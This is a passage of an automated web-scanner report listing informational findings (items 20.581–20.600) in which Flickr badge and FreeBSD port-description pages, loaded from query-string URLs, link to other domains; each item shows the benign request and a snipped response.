Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "MIIdMmV74Eobe+Cc/gz2Dw"
Content-Length: 34425
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 811
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub[-_.]* - FTP File Search</tit
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</a> - <a href="http://www.ftp-sites.org/" title="Regularly updated list of 5000+ anonymous FTP sites">FTP Sites List</a>
...[SNIP]...
<br />© 1997-2010 <a href="http://www.maruhn.com/">MARUHN IT Consulting</a>
...[SNIP]...

20.581. http://www.flickr.com/badge_code_v2.gne previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/badge_code_v2.gne

Issue detail

The page was loaded from a URL containing a query string:

http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05

The response contains the following link to another domain:

http://geo.yahoo.com/p?s=792600102&t=d1dfc89598702b40d584f63b47ad0017&r=http%3A%2F%2Fblog.tweetmeme.com%2F&fl_ev=0&lang=en&intl=us

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:44:59 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:44:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www45.flickr.mud.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 2168

var b_txt = '';

// write the badge


                       b_txt+= '<div class="flickr_badge_image" id="flickr_badge_image1"><a href="http://www.flickr.com/photos/favoritltd/4795392811/"><img src="http://farm5.
...[SNIP]...
<span style="position:absolute;left:-999em;top:-999em;visibility:hidden" class="flickr_badge_beacon"><img src="http://geo.yahoo.com/p?s=792600102&t=d1dfc89598702b40d584f63b47ad0017&r=http%3A%2F%2Fblog.tweetmeme.com%2F&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></span>
...[SNIP]...

20.582. http://www.flickr.com/badge_code_v2.gne previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/badge_code_v2.gne

Issue detail

The page was loaded from a URL containing a query string:

http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05

The response contains the following link to another domain:

http://geo.yahoo.com/p?s=792600102&t=a7e7ea58c2d3e173c6897cecfedb6194&r=http%3A%2F%2Fblog.tweetmeme.com%2F&fl_ev=0&lang=en&intl=us

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:21:25 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:21:25 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www111.flickr.mud.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 2168

var b_txt = '';

// write the badge


                       b_txt+= '<div class="flickr_badge_image" id="flickr_badge_image1"><a href="http://www.flickr.com/photos/favoritltd/4795392811/"><img src="http://farm5.
...[SNIP]...
<span style="position:absolute;left:-999em;top:-999em;visibility:hidden" class="flickr_badge_beacon"><img src="http://geo.yahoo.com/p?s=792600102&t=a7e7ea58c2d3e173c6897cecfedb6194&r=http%3A%2F%2Fblog.tweetmeme.com%2F&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></span>
...[SNIP]...

20.583. http://www.freebsd.org/cgi/pds.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/pds.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/pds.cgi?ports/mail/adcomplain

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/pds.cgi?ports/mail/adcomplain HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:47 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>FreeBSD Ports downlo
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...

20.584. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/nntpcache/pkg-descr

The response contains the following links to other domains:

http://iq.org/~proff/nntpcache.org/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.nocem.org/

Request

GET /cgi/url.cgi?ports/news/nntpcache/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:12 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
e multiple servers, (permiting local newsgroups with remote
NNTP feeds), filter articles, xovers, and headers based on weighted
regular expressions, and has built in NoCem/PGP (anti-spam) support
(see <A HREF="http://www.nocem.org/">http://www.nocem.org/</A> for details).

WWW: <A HREF="http://iq.org/~proff/nntpcache.org/">http://iq.org/~proff/nntpcache.org/</A>
...[SNIP]...

20.585. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/leafnode+/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www25.big.jp/~jam/leafnode+/

Request

GET /cgi/url.cgi?ports/news/leafnode+/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:56 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
node.

NOTE: This software contains a number of data-loss bugs and does not
appear to be actively maintained. For new installations, the
news/leafnode port is likely to serve your needs better.

WWW: <A HREF="http://www25.big.jp/~jam/leafnode+/">http://www25.big.jp/~jam/leafnode+/</A>
...[SNIP]...

20.586. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/www/mozex/pkg-descr

The response contains the following links to other domains:

http://mozex.mozdev.org/index.html
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/www/mozex/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:59 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ctions:

* view page source
* edit content of textareas (possibly utilizing a spell-checker in the
text editor)
* handle mailto, news, telnet and FTP links
* download files

WWW: <A HREF="http://mozex.mozdev.org/index.html">http://mozex.mozdev.org/index.html</A>
...[SNIP]...

20.587. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/www/p5-Apache-NNTPGateway/pkg-descr

The response contains the following links to other domains:

http://search.cpan.org/dist/Apache-NNTPGateway/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/www/p5-Apache-NNTPGateway/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Apache::NNTPGateway - a NNTP interface for mod_perl enabled Apache web
server.

WWW: <A HREF="http://search.cpan.org/dist/Apache-NNTPGateway/">http://search.cpan.org/dist/Apache-NNTPGateway/</A>
...[SNIP]...

20.588. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/slrn/pkg-descr

The response contains the following links to other domains:

http://slrn.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/slrn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:32 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
to use but powerful NNTP/spool based newsreader. It is
highly customizable, supports scoring, free key bindings, and can be
extended using the SLang macro language. slrn supports SSL and IPv6.

WWW: <A HREF="http://slrn.sourceforge.net/">http://slrn.sourceforge.net/</A>
...[SNIP]...

20.589. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/p5-NNTPClient/pkg-descr

The response contains the following links to other domains:

http://search.cpan.org/dist/NNTPClient/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-NNTPClient/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
This module implements a client interface to NNTP, enabling a Perl 5
application to talk to NNTP servers. It uses the OOP (Object Oriented
Programming) interface introduced with Perl 5.

WWW: <A HREF="http://search.cpan.org/dist/NNTPClient/">http://search.cpan.org/dist/NNTPClient/</A>
...[SNIP]...

20.590. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/www/pnews/pkg-descr

The response contains the following links to other domains:

http://pnews.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/www/pnews/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:27 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
d IMAP is not required.
* Authentication is easily configured to work with your existing system.
* Multiple language interface and Traditional/Simplified Chinese coding
conversion.

WWW: <A HREF="http://pnews.sourceforge.net/">http://pnews.sourceforge.net/</A>
...[SNIP]...

20.591. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/cleanscore/pkg-descr

The response contains the following links to other domains:

http://slrn.sourceforge.net/cleanscore/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/cleanscore/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:24 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
cleanscore is a perl script to clean up your slrn score file.
It can be used to purge expired entries automatically, e.g. by
calling it from cron.

WWW: <A HREF="http://slrn.sourceforge.net/cleanscore/">http://slrn.sourceforge.net/cleanscore/</A>
...[SNIP]...

20.592. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/p5-NewsLib/pkg-descr

The response contains the following links to other domains:

http://search.cpan.org/dist/newslib/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-NewsLib/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:19 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
           A standard NNTP authentication method
Net::NNTP::Proxy        A news server in perl
Net::NNTP::Client        Simulate an entire NNTP client
Net::NNTP::Functions        Code to implement NNTP-standard functions

WWW: <A HREF="http://search.cpan.org/dist/newslib/">http://search.cpan.org/dist/newslib/</A>
...[SNIP]...

20.593. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/mail/adcomplain/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.rdrop.com/users/billmc/adcomplain.html

Request

GET /cgi/url.cgi?ports/mail/adcomplain/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:13 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
to complain. Mail bombing (e-mailing megabytes
of useless data) and public flaming (replying on usenet, causing your
complaint to be duplicated on every machine in the network) are
discouraged.

WWW: <A HREF="http://www.rdrop.com/users/billmc/adcomplain.html">http://www.rdrop.com/users/billmc/adcomplain.html</A>
...[SNIP]...

20.594. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/cnews/pkg-descr

The response contains the following links to other domains:

http://www.dinoex.net/c-news.html
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/cnews/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:24 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
</A>
WWW: <A HREF="http://www.dinoex.net/c-news.html">http://www.dinoex.net/c-news.html</A>
...[SNIP]...

20.595. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/crashmail/pkg-descr

The response contains the following links to other domains:

http://www.df.lth.se/~billing/crashmail.html
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/crashmail/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:25 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
for
the Amiga called CrashMail. This is the new generation of that tosser!
This generation is more basic without the fancy GUI, but does what it
is supposed to do and is above all more portable.

WWW: <A HREF="http://www.df.lth.se/~billing/crashmail.html">http://www.df.lth.se/~billing/crashmail.html</A>
...[SNIP]...

20.596. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/papercut/pkg-descr

The response contains the following links to other domains:

http://pessoal.org/papercut/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/papercut/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:25 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
t is a news server written in 100% pure Python. It designed
to be use as backend for PHP, or to be run on a small network.
Messages can be stored in a MySQL database.
It doesn't support feeding.

WWW: <A HREF="http://pessoal.org/papercut/">http://pessoal.org/papercut/</A>
...[SNIP]...

20.597. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/nntpswitch/pkg-descr

The response contains the following links to other domains:

http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/
http://www.nntpswitch.org/

Request

GET /cgi/url.cgi?ports/news/nntpswitch/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:12 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
n the backend server type, all NNTP commands and extensions
are supported, including (remote) authorization. Accounting is supported
in a user-friendly matter for data limited NNTP connections.

WWW: <A HREF="http://www.nntpswitch.org/">http://www.nntpswitch.org/</A>
...[SNIP]...

20.598. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/dnews/pkg-descr

The response contains the following links to other domains:

http://netwinsite.com/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/dnews/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:31 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
y, totally configurable without recompiling
- Documentated
- Supported
- Speed
- XOVER implemented in software
- Streaming support
- Strictly limited machine impact due to single threaded nature

WWW: <A HREF="http://netwinsite.com/">http://netwinsite.com/</A>
...[SNIP]...

20.599. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/PicMonger/pkg-descr

The response contains the following links to other domains:

http://picmonger.sourceforge.net/
http://www.freebsdfoundation.org/
http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/PicMonger/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:12 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
s files and decodes only the file types you select
* Easy installation (uses GNU autoconf/automake)
* Error logging for easy troubleshooting (rarely an issue)
* Distributed under the GNU GPL

WWW: <A HREF="http://PicMonger.sourceforge.net/">http://PicMonger.sourceforge.net/</A>
...[SNIP]...

20.600. http://www.freebsd.org/cgi/url.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.freebsd.org/cgi/url.cgi?ports/news/trn4/pkg-descr

